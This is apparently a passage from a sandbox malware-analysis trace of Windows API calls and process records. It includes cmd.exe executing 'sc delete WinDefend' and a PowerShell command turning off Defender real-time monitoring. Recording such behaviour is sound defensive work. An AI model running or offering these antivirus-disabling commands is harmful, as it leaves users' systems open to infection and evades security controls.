lpType=0x39e83c, lpData=0x39e840, lpcbData=0x39e838*=0x1000 | out: lpType=0x39e83c*=0x0, lpData=0x39e840*=0x9, lpcbData=0x39e838*=0x1000) returned 0x2 [0128.685] RegCloseKey (hKey=0x68) returned 0x0 [0128.685] time (in: timer=0x0 | out: timer=0x0) returned 0x5c5b0e6f [0128.685] srand (_Seed=0x5c5b0e6f) [0128.685] GetCommandLineW () returned="/c sc delete WinDefend" [0128.685] GetCommandLineW () returned="/c sc delete WinDefend" [0128.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.685] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e1f58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0128.686] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.686] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.686] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.686] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.686] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.686] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.686] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.686] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.686] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.686] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.686] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.686] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.686] GetEnvironmentStringsW () returned 0x4e2168* [0128.686] FreeEnvironmentStringsW (penv=0x4e2168) returned 1 [0128.686] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.686] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.687] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.687] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.687] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.687] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.687] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.687] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.687] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.687] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f600 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x39f600, lpFilePart=0x39f5fc | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x39f5fc*="system32") returned 0x13 [0128.687] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0128.687] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x39f37c | out: lpFindFileData=0x39f37c) returned 0x4d07f0 [0128.687] FindClose (in: hFindFile=0x4d07f0 | out: hFindFile=0x4d07f0) returned 1 [0128.687] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x39f37c | out: lpFindFileData=0x39f37c) returned 0x4d07f0 [0128.687] FindClose (in: hFindFile=0x4d07f0 | out: hFindFile=0x4d07f0) returned 1 [0128.687] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0128.688] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0128.688] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0128.688] GetEnvironmentStringsW () returned 0x4e2168* [0128.688] FreeEnvironmentStringsW (penv=0x4e2168) returned 1 [0128.688] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.688] GetConsoleOutputCP () returned 0x1b5 [0128.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0128.796] GetUserDefaultLCID () returned 0x409 [0128.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a574950, cchData=8 | out: lpLCData=":") returned 2 [0128.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f740, cchData=128 | out: lpLCData="0") returned 2 [0128.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f740, cchData=128 | out: lpLCData="0") returned 2 [0128.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f740, cchData=128 | out: lpLCData="1") returned 2 [0128.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a574940, cchData=8 | out: lpLCData="/") returned 2 [0128.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a574d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a574d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a574d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a574cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a574c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a574c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a574c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a574930, cchData=8 | out: lpLCData=".") returned 2 [0128.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a574920, cchData=8 | out: lpLCData=",") returned 2 [0128.797] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.798] GetConsoleTitleW (in: lpConsoleTitle=0x4d1030, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0128.798] GetProcAddress (hModule=0x76540000, lpProcName="CopyFileExW") returned 0x76573b92 [0128.798] GetProcAddress (hModule=0x76540000, lpProcName="IsDebuggerPresent") returned 0x76554a5d [0128.798] GetProcAddress (hModule=0x76540000, lpProcName="SetConsoleInputExeNameW") returned 0x7656a79d [0128.799] _wcsicmp (_String1="sc", _String2=")") returned 74 [0128.799] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0128.799] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0128.799] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0128.799] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0128.799] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0128.799] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0128.800] GetConsoleTitleW (in: lpConsoleTitle=0x39f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.800] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0128.800] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0128.800] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0128.800] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0128.800] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0128.800] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0128.800] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0128.801] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0128.801] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0128.801] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0128.801] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0128.801] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0128.801] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0128.801] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0128.801] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0128.801] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0128.801] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0128.801] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0128.801] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0128.801] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0128.801] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0128.801] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0128.801] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0128.801] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0128.801] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0128.801] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0128.801] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0128.801] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0128.801] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0128.801] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0128.801] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0128.801] _wcsicmp (_String1="sc", _String2="START") returned -17 [0128.801] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0128.801] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0128.801] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0128.801] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0128.801] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0128.801] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0128.801] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0128.801] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0128.801] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0128.801] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0128.802] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0128.802] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0128.802] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0128.802] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0128.802] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0128.802] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0128.802] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0128.802] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0128.802] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0128.802] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0128.802] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0128.802] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0128.802] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0128.802] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0128.802] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0128.802] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0128.802] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0128.802] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0128.802] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0128.802] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0128.802] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0128.802] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0128.802] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0128.802] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0128.802] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0128.802] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0128.802] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0128.802] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0128.802] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0128.802] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0128.802] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0128.802] _wcsicmp (_String1="sc", _String2="START") returned -17 [0128.802] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0128.802] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0128.802] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0128.803] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0128.803] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0128.803] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0128.803] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0128.803] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0128.803] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0128.803] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0128.803] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0128.803] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0128.803] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0128.803] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0128.804] SetErrorMode (uMode=0x0) returned 0x0 [0128.804] SetErrorMode (uMode=0x1) returned 0x0 [0128.804] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e4cb8, lpFilePart=0x39ef58 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x39ef58*="system32") returned 0x13 [0128.804] SetErrorMode (uMode=0x0) returned 0x1 [0128.804] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.804] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.810] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.812] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0128.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x39ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ecd4) returned 0x4e4f80 [0128.812] FindClose (in: hFindFile=0x4e4f80 | out: hFindFile=0x4e4f80) returned 1 [0128.812] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x39ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ecd4) returned 0xffffffff [0128.812] GetLastError () returned 0x2 [0128.813] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x39ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x39ecd4) returned 0x4e4f80 [0128.813] FindClose (in: hFindFile=0x4e4f80 | out: hFindFile=0x4e4f80) returned 1 [0128.813] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.813] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.813] GetConsoleTitleW (in: lpConsoleTitle=0x39f1cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.813] InitializeProcThreadAttributeList (in: lpAttributeList=0x39f054, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x39f11c | out: lpAttributeList=0x39f054, lpSize=0x39f11c) returned 1 [0128.813] UpdateProcThreadAttribute (in: lpAttributeList=0x39f054, dwFlags=0x0, Attribute=0x60001, lpValue=0x39f114, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x39f054, lpPreviousValue=0x0) returned 1 [0128.813] GetStartupInfoW (in: lpStartupInfo=0x39f010 | out: lpStartupInfo=0x39f010*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0128.813] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0128.814] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0128.815] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.816] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x39f0b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x39f0fc | out: lpCommandLine="sc delete WinDefend", lpProcessInformation=0x39f0fc*(hProcess=0x78, hThread=0x74, dwProcessId=0xac4, dwThreadId=0xad4)) returned 1 [0128.820] CloseHandle (hObject=0x74) returned 1 [0128.820] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.820] GetEnvironmentStringsW () returned 0x4e3f18* [0128.821] FreeEnvironmentStringsW (penv=0x4e3f18) returned 1 [0128.821] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0129.065] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x39eff0 | out: lpExitCode=0x39eff0*=0x0) returned 1 [0129.065] CloseHandle (hObject=0x78) returned 1 [0129.065] _vsnwprintf (in: _Buffer=0x39f138, _BufferCount=0x13, _Format="%08X", _ArgList=0x39effc | out: _Buffer="00000000") returned 8 [0129.065] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.065] GetEnvironmentStringsW () returned 0x4e5210* [0129.065] FreeEnvironmentStringsW (penv=0x4e5210) returned 1 [0129.065] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.065] GetEnvironmentStringsW () returned 0x4e5210* [0129.065] FreeEnvironmentStringsW (penv=0x4e5210) returned 1 [0129.065] DeleteProcThreadAttributeList (in: lpAttributeList=0x39f054 | out: lpAttributeList=0x39f054) [0129.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.065] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0129.066] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.066] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0129.066] SetConsoleInputExeNameW () returned 0x1 [0129.066] GetConsoleOutputCP () returned 0x1b5 [0129.066] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0129.066] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.066] exit (_Code=0) Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x417ce000" os_pid = "0x318" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x844" cmd_line = "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2556 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2557 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2558 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2559 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2560 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2561 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2562 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2563 start_va = 0x4a550000 end_va = 0x4a59bfff entry_point = 0x4a550000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2564 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2565 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2566 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2567 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2568 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2569 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2570 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2571 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2572 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2573 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2574 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2575 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2576 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2680 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 